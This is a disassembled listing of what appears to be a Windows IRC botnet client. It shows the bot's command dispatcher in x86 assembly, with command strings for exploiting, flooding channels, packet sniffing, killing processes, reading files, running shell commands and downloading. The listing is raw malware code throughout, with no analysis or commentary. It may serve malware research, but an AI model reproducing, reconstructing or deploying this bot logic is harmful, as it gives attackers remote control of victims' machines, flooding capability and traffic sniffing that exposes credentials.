ecx jz loc_4034A6 call sub_40B2C0 push ebx call dword_427064 ; ExitProcess loc_404A23: ; CODE XREF: sub_401ACD+1A12j push offset aGet ; "get" push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404AB1 cmp ds:dword_4CEE08, ebx jz short loc_404A4B push offset dword_4CE7E8 loc_404A41: ; CODE XREF: sub_401ACD+2FE2j push offset unk_42BD50 jmp loc_404AE1 ; --------------------------------------------------------------------------- loc_404A4B: ; CODE XREF: sub_401ACD+2F6Dj push 10h pop eax mov [ebp+var_2CC], eax push eax lea eax, [ebp+var_2E8] push ebx push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_2CC] push eax lea eax, [ebp+var_2E8] push eax push [ebp+arg_4] call dword_427230 ; getsockname movzx eax, [ebp+var_2E2] push eax movzx eax, [ebp+var_2E3] push eax movzx eax, [ebp+var_2E4] push eax lea eax, [ebp+var_E30] push offset aD_D_D_ ; "%d.%d.%d.*" push eax call sub_41B886 add esp, 14h lea eax, [ebp+var_E30] push eax jmp short loc_404A41 ; --------------------------------------------------------------------------- loc_404AB1: ; CODE XREF: sub_401ACD+2F65j push esi call ds:dword_4CB694 ; inet_addr cmp eax, 0FFFFFFFFh push esi jnz short loc_404AC5 push offset unk_42BD10 jmp short loc_404AE1 ; --------------------------------------------------------------------------- loc_404AC5: ; CODE XREF: sub_401ACD+2FEFj push offset dword_4CE7E8 call sub_41BEB0 pop ecx mov ds:dword_4CEE08, 1 pop ecx push esi push offset unk_42BCE4 loc_404AE1: ; CODE XREF: sub_401ACD+2F79j ; sub_401ACD+2FF6j lea eax, [ebp+var_2C4] push eax call sub_41B886 add esp, 0Ch jmp loc_4034FE ; --------------------------------------------------------------------------- loc_404AF5: ; CODE XREF: sub_401ACD+19FAj push edi push offset aExploit ; "exploit" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_404BF8 mov eax, [ebp+var_4] mov esi, offset aF ; "#f" mov [ebp+var_13E4], eax mov eax, [ebp+var_8] mov [ebp+var_13E0], eax mov eax, [ebp+arg_4] mov [ebp+var_13F4], eax mov edi, 80h push esi lea eax, [ebp+var_1474] push edi push eax mov [ebp+var_13EC], 1 call sub_41B980 add esp, 0Ch lea eax, [ebp+var_14F4] push esi push edi push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_1504] push [ebp+arg_10] push 10h push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_1504] push eax lea eax, [ebp+var_2C4] push offset unk_42BCAC push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 8 push eax call sub_40B0F7 add esp, 18h mov [ebp+var_13E8], eax lea eax, [ebp+var_2FC] push eax lea eax, [ebp+var_1504] push ebx push eax push offset sub_40B8A2 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_13E8] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_404BE7 loc_404BD1: ; CODE XREF: sub_401ACD+3118j cmp [ebp+var_13DC], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_404BD1 ; --------------------------------------------------------------------------- loc_404BE7: ; CODE XREF: sub_401ACD+3102j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42BC6C jmp loc_4049EC ; --------------------------------------------------------------------------- loc_404BF8: ; CODE XREF: sub_401ACD+3037j push edi push offset aReconnect_in ; "reconnect.in" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4097C1 push edi push offset aRin ; "rin" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4097C1 push edi push offset aReconnect_in_m ; "reconnect.in.ms" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409779 push edi push offset aRinms ; "rinms" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409779 push [ebp+arg_8] push offset aFlood ; "flood" call sub_41C070 mov edi, dword_427078 pop ecx test eax, eax pop ecx jnz loc_4057DF call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 push [ebp+arg_10] push offset aLoad ; "load" call sub_41C070 add esp, 0Ch test eax, eax jnz short loc_404CFE cmp [ebp+esi+var_80], ebx jz short loc_404CFE push [ebp+esi+var_80] call sub_41B779 pop ecx push eax push [ebp+esi+var_84] call sub_41B779 pop ecx push eax push [ebp+esi+var_88] call sub_417A60 add esp, 0Ch lea eax, [ebp+var_2C4] push [ebp+esi+var_84] push [ebp+esi+var_88] push [ebp+esi+var_80] push offset unk_42BC04 push eax call sub_41B886 add esp, 14h cmp [ebp+var_8], ebx jnz short loc_404CFE push ebx lea eax, [ebp+var_2C4] push [ebp+var_4] push eax push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h loc_404CFE: ; CODE XREF: sub_401ACD+31BAj ; sub_401ACD+31C0j ... push [ebp+arg_10] push offset dword_42BC00 call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404D6A mov eax, [ebp+esi+var_84] cmp eax, ebx jz short loc_404D6A push offset asc_42D128 ; " " push offset dword_42BBFC push eax call sub_417EEF push eax lea eax, [ebp+var_50F4] push eax call sub_41BEB0 add esp, 14h lea eax, [ebp+var_50F4] push eax lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset dword_42BBEC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_404D6A: ; CODE XREF: sub_401ACD+3242j ; sub_401ACD+324Dj push [ebp+arg_10] push offset dword_42BBE8 call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404DD6 mov eax, [ebp+esi+var_84] cmp eax, ebx jz short loc_404DD6 push offset asc_42D128 ; " " push offset dword_42BBFC push eax call sub_417EEF push eax lea eax, [ebp+var_4BF0] push eax call sub_41BEB0 add esp, 14h lea eax, [ebp+var_4BF0] push eax lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset dword_42BBD4 push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_404DD6: ; CODE XREF: sub_401ACD+32AEj ; sub_401ACD+32B9j push [ebp+arg_10] push offset aNt ; "nt" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404E42 mov eax, [ebp+esi+var_84] cmp eax, ebx jz short loc_404E42 push offset asc_42D128 ; " " push offset dword_42BBFC push eax call sub_417EEF push eax lea eax, [ebp+var_46EC] push eax call sub_41BEB0 add esp, 14h lea eax, [ebp+var_46EC] push eax lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aNoticeSS_1 ; "notice %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_404E42: ; CODE XREF: sub_401ACD+331Aj ; sub_401ACD+3325j push [ebp+arg_10] push offset aMode ; "mode" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404EAE mov eax, [ebp+esi+var_84] cmp eax, ebx jz short loc_404EAE push offset asc_42D128 ; " " push offset dword_42BBFC push eax call sub_417EEF push eax lea eax, [ebp+var_4DF0] push eax call sub_41BEB0 add esp, 14h lea eax, [ebp+var_4DF0] push eax lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aModeSS ; "mode %s %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_404EAE: ; CODE XREF: sub_401ACD+3386j ; sub_401ACD+3391j push [ebp+arg_10] push offset aJoin ; "join" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404EED mov eax, [ebp+esi+var_88] cmp eax, ebx jz short loc_404EED push eax lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h loc_404EED: ; CODE XREF: sub_401ACD+33F2j ; sub_401ACD+33FDj push [ebp+arg_10] push offset aPart_0 ; "part" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404F2C mov eax, [ebp+esi+var_88] cmp eax, ebx jz short loc_404F2C push eax lea eax, [ebp+var_2C4] push offset aPartS ; "part %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h loc_404F2C: ; CODE XREF: sub_401ACD+3431j ; sub_401ACD+343Cj push [ebp+arg_10] push offset aPartflood ; "partflood" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404F70 mov eax, [ebp+esi+var_88] cmp eax, ebx jz short loc_404F70 push offset dword_427638 push eax lea eax, [ebp+var_2C4] push offset aPartSS ; "part %s %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_404F70: ; CODE XREF: sub_401ACD+3470j ; sub_401ACD+347Bj push [ebp+arg_10] push offset aPnick ; "pnick" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_404FE9 cmp [ebp+esi+var_88], ebx jz short loc_404FE9 call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 cdq mov ecx, 0F423Fh idiv ecx lea eax, [ebp+var_17B4] push edx push [ebp+esi+var_88] push offset dword_42BB64 push eax call sub_41B886 add esp, 10h lea eax, [ebp+var_17B4] push eax lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h loc_404FE9: ; CODE XREF: sub_401ACD+34B4j ; sub_401ACD+34BDj push [ebp+arg_10] push offset dword_42BB50 call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405136 cmp [ebp+esi+var_88], ebx jz loc_405136 push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h lea eax, [ebp+var_2C4] push offset dword_427638 push [ebp+esi+var_88] push offset aPartSS ; "part %s %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 3E8h idiv ecx push edx call edi ; Sleep push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 384h idiv ecx push edx call edi ; Sleep push offset dword_427638 lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aPartSS ; "part %s %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 0C8h idiv ecx push edx call edi ; Sleep push offset dword_427638 lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aPartSS ; "part %s %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_405136: ; CODE XREF: sub_401ACD+352Dj ; sub_401ACD+353Aj push [ebp+arg_10] push offset dword_42BB4C call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4051D0 cmp [ebp+esi+var_88], ebx jz short loc_4051D0 call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 cdq mov ecx, 0F423Fh idiv ecx push edx call sub_41B8E2 cdq mov ecx, 0F423Fh idiv ecx push edx call sub_41B8E2 cdq mov ecx, 0F423Fh idiv ecx push edx call sub_41B8E2 cdq mov ecx, 0F423Fh idiv ecx push edx call sub_41B8E2 cdq mov ecx, 0F423Fh idiv ecx lea eax, [ebp+var_2C4] push edx push [ebp+esi+var_88] push offset dword_42BB24 push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 24h loc_4051D0: ; CODE XREF: sub_401ACD+367Aj ; sub_401ACD+3687j push [ebp+arg_10] push offset aNick_0 ; "nick" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4052D2 mov eax, [ebp+esi+var_88] cmp eax, ebx jz loc_4052D2 push eax lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 lea eax, [ebp+var_4BC] push eax call sub_417ADE add esp, 14h lea eax, [ebp+var_4BC] push eax lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep lea eax, [ebp+var_4BC] push eax call sub_417ADE pop ecx lea eax, [ebp+var_4BC] push eax lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 1F4h idiv ecx push edx call edi ; Sleep lea eax, [ebp+var_4BC] push eax call sub_417ADE pop ecx lea eax, [ebp+var_4BC] push eax lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h loc_4052D2: ; CODE XREF: sub_401ACD+3714j ; sub_401ACD+3723j push [ebp+arg_10] push offset aChgnick ; "chgnick" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_405319 lea eax, [ebp+var_1808] push eax call sub_417ADE pop ecx lea eax, [ebp+var_1808] push eax lea eax, [ebp+var_2C4] push offset dword_42BB5C push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h loc_405319: ; CODE XREF: sub_401ACD+3816j push [ebp+arg_10] push offset aMsg ; "msg" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405408 cmp [ebp+esi+var_88], ebx jz loc_405408 push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h lea eax, [ebp+var_2C4] push offset dword_42763C push [ebp+esi+var_88] push offset dword_42BBEC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 3E8h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset dword_42BBEC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 384h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset dword_42BBEC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_405408: ; CODE XREF: sub_401ACD+385Dj ; sub_401ACD+386Aj push [ebp+arg_10] push offset aNotice_0 ; "notice" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4054F7 cmp [ebp+esi+var_88], ebx jz loc_4054F7 push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h lea eax, [ebp+var_2C4] push offset dword_42763C push [ebp+esi+var_88] push offset aNoticeSS_0 ; "NOTICE %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 3E8h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aNoticeSS_0 ; "NOTICE %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 384h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aNoticeSS_0 ; "NOTICE %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_4054F7: ; CODE XREF: sub_401ACD+394Cj ; sub_401ACD+3959j push [ebp+arg_10] push offset aCtcp ; "ctcp" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40560E cmp [ebp+esi+var_88], ebx jz loc_40560E push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset dword_42BADC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset dword_42BAC4 push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset dword_42BAAC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset dword_42BAAC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h loc_40560E: ; CODE XREF: sub_401ACD+3A3Bj ; sub_401ACD+3A48j push [ebp+arg_10] push offset aMix ; "mix" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405734 cmp [ebp+esi+var_88], ebx jz loc_405734 push [ebp+esi+var_88] lea eax, [ebp+var_2C4] push offset aJoinS ; "join %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset dword_42BADC push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 10h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aNoticeSS_0 ; "NOTICE %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aPrivmsgSS_0 ; "PRIVMSG %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h call sub_41B8E2 cdq mov ecx, 514h idiv ecx push edx call edi ; Sleep push offset dword_42763C lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aNoticeSS_0 ; "NOTICE %s :%s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_405734: ; CODE XREF: sub_401ACD+3B52j ; sub_401ACD+3B5Fj push [ebp+arg_10] push offset aRegister ; "register" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_40577A mov eax, [ebp+esi+var_84] cmp eax, ebx jz short loc_40577A push eax lea eax, [ebp+var_2C4] push [ebp+esi+var_88] push offset aNickservRegist ; "nickserv register %s %s" push eax call sub_41B886 lea eax, [ebp+var_2C4] push eax call sub_417789 add esp, 14h loc_40577A: ; CODE XREF: sub_401ACD+3C78j ; sub_401ACD+3C83j push [ebp+arg_10] push offset aOff ; "off" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_4062C4 mov edi, offset dword_4D46EC loc_405796: ; CODE XREF: sub_401ACD+3CE8j cmp dword ptr [edi-4], 1 jnz short loc_4057A9 mov eax, [edi] cmp eax, ebx jbe short loc_4057A9 push eax call ds:dword_4CB6EC ; closesocket loc_4057A9: ; CODE XREF: sub_401ACD+3CCDj ; sub_401ACD+3CD3j add edi, 210h cmp edi, offset dword_4DAE0C jl short loc_405796 cmp [ebp+var_8], ebx jnz loc_4062C4 push ebx push [ebp+var_4] push offset unk_42BA4C push [ebp+var_88] push [ebp+arg_4] call sub_409A73 add esp, 14h jmp loc_4062C4 ; --------------------------------------------------------------------------- loc_4057DF: ; CODE XREF: sub_401ACD+3196j mov edi, [ebp+arg_8] push edi push offset aNick_0 ; "nick" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409759 push edi push offset aN ; "n" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409759 push edi push offset aJoin ; "join" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409732 push edi push offset aJ ; "j" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409732 push edi push offset aPart_0 ; "part" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409712 push edi push offset aPt ; "pt" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409712 push edi push offset aRaw ; "raw" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4096D6 push edi push offset aR ; "r" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4096D6 push edi push offset aKillthread ; "killthread" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4095D6 push edi push offset aK ; "k" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4095D6 push edi push offset aC_quit ; "c_quit" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409528 push edi push offset aC_q ; "c_q" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409528 push edi push offset aC_rndnick ; "c_rndnick" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4094D6 push edi push offset aC_rn ; "c_rn" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4094D6 push edi push offset aPrefix ; "prefix" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4094BD push edi push offset aPr ; "pr" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4094BD push edi push offset aOpen ; "open" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40948F push edi push offset aO ; "o" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40948F push edi push offset aServer ; "server" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409472 push edi push offset aSe ; "se" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409472 push edi push offset aDns ; "dns" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409407 push edi push offset aDn ; "dn" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409407 push edi push offset aKillproc ; "killproc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4093D7 push edi push offset aKp ; "kp" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4093D7 push edi push offset aKill ; "kill" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409378 push edi push offset aKi ; "ki" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409378 push edi push offset aDelete ; "delete" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40933C push edi push offset aDel ; "del" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40933C push edi push offset aGet ; "get" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40925D push edi push offset aGt ; "gt" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40925D push edi push offset aList ; "list" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40923B push edi push offset aLi ; "li" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_40923B push edi push offset aVisit ; "visit" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409147 push edi push offset aV ; "v" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409147 push edi push offset aMirccmd ; "mirccmd" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409110 push edi push offset aMirc ; "mirc" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409110 push edi push offset aCmd ; "cmd" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4090A6 push edi push offset aCm ; "cm" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_4090A6 push edi push offset aReadfile ; "readfile" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409029 push edi push offset aRf ; "rf" call sub_41C070 pop ecx test eax, eax pop ecx jz loc_409029 push edi push offset aPsniff ; "psniff" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405C7C push [ebp+arg_10] push offset aOn ; "on" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405C42 push 20h call sub_40B33F test eax, eax pop ecx jle short loc_405B6C push offset dword_42B950 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405B6C: ; CODE XREF: sub_401ACD+4093j mov eax, [ebp+arg_4] mov esi, [ebp+esi+var_88] mov [ebp+var_EC4], eax mov eax, [ebp+var_4] mov [ebp+var_E3C], eax mov eax, [ebp+var_8] cmp esi, ebx mov [ebp+var_E38], eax jnz short loc_405BAE mov esi, offset aF_1 ; "#f" push offset byte_43D808 push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_405BAE mov esi, [ebp+var_88] loc_405BAE: ; CODE XREF: sub_401ACD+40C3j ; sub_401ACD+40D9j push esi lea eax, [ebp+var_EC0] push 80h push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_2C4] push offset dword_42B920 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 20h push eax call sub_40B0F7 add esp, 14h mov [ebp+var_E40], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_EC4] push ebx push eax push offset sub_411FD6 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_E40] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_405C31 loc_405C1B: ; CODE XREF: sub_401ACD+4162j cmp [ebp+var_E34], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_405C1B ; --------------------------------------------------------------------------- loc_405C31: ; CODE XREF: sub_401ACD+414Cj call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42B8E4 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405C42: ; CODE XREF: sub_401ACD+4083j push [ebp+arg_10] push offset aOff ; "off" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40828C push ebx push 20h call sub_40B2F2 pop ecx cmp eax, ebx pop ecx jle short loc_405C72 push eax push offset dword_42B8A8 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405C72: ; CODE XREF: sub_401ACD+4198j push offset dword_42B87C jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405C7C: ; CODE XREF: sub_401ACD+406Cj push edi push offset aSniffer ; "sniffer" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405DCE push [ebp+arg_10] push offset aOn ; "on" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405D94 push 21h call sub_40B33F test eax, eax pop ecx jle short loc_405CBE push offset unk_42B854 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405CBE: ; CODE XREF: sub_401ACD+41E5j mov eax, [ebp+arg_4] mov esi, [ebp+esi+var_88] mov [ebp+var_FEC], eax mov eax, [ebp+var_4] mov [ebp+var_F64], eax mov eax, [ebp+var_8] cmp esi, ebx mov [ebp+var_F60], eax jnz short loc_405D00 mov esi, offset aF_1 ; "#f" push offset byte_43D808 push esi call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_405D00 mov esi, [ebp+var_88] loc_405D00: ; CODE XREF: sub_401ACD+4215j ; sub_401ACD+422Bj push esi lea eax, [ebp+var_FE8] push 80h push eax call sub_41B980 add esp, 0Ch lea eax, [ebp+var_2C4] push offset unk_42B824 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 21h push eax call sub_40B0F7 add esp, 14h mov [ebp+var_F68], eax lea eax, [ebp+var_10] push eax lea eax, [ebp+var_FEC] push ebx push eax push offset sub_412661 push ebx push ebx call dword_42707C ; CreateThread mov ecx, [ebp+var_F68] imul ecx, 234h cmp eax, ebx mov dword_43E5A4[ecx], eax jz short loc_405D83 loc_405D6D: ; CODE XREF: sub_401ACD+42B4j cmp [ebp+var_F5C], ebx jnz loc_40828C push 32h call dword_427078 ; Sleep jmp short loc_405D6D ; --------------------------------------------------------------------------- loc_405D83: ; CODE XREF: sub_401ACD+429Ej call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_42B7E8 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405D94: ; CODE XREF: sub_401ACD+41D5j push [ebp+arg_10] push offset aOff ; "off" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40828C push ebx push 21h call sub_40B2F2 pop ecx cmp eax, ebx pop ecx jle short loc_405DC4 push eax push offset unk_42B7A8 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405DC4: ; CODE XREF: sub_401ACD+42EAj push offset unk_42B778 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405DCE: ; CODE XREF: sub_401ACD+41BEj push edi push offset aIdent ; "ident" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_405EA3 push [ebp+arg_10] push offset aOn ; "on" call sub_41C070 pop ecx test eax, eax pop ecx jnz short loc_405E69 push 2 call sub_40B33F test eax, eax pop ecx jle short loc_405E0C push offset dword_42B750 jmp loc_406F05 ; --------------------------------------------------------------------------- loc_405E0C: ; CODE XREF: sub_401ACD+4333j lea eax, [ebp+var_2C4] push offset dword_42B724 push eax call sub_41B886 push ebx lea eax, [ebp+var_2C4] push 2 push eax call sub_40B0F7 add esp, 14h mov esi, eax lea eax, [ebp+var_10] push eax push ebx push esi push offset sub_4101FD push ebx push ebx call dword_42707C ; CreateThread imul esi, 234h cmp eax, ebx mov dword_43E5A4[esi], eax jnz loc_40828C call dword_42708C ; RtlGetLastWin32Error push eax push offset dword_42B6F0 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405E69: ; CODE XREF: sub_401ACD+4327j push [ebp+arg_10] push offset aOff ; "off" call sub_41C070 pop ecx test eax, eax pop ecx jnz loc_40828C push ebx push 2 call sub_40B2F2 pop ecx cmp eax, ebx pop ecx jle short loc_405E99 push eax push offset dword_42B6B8 jmp loc_4049EC ; --------------------------------------------------------------------------- loc_405E99: ; CODE XREF: sub_401ACD+43BFj push offset dword_42B698 jmp loc_406F05 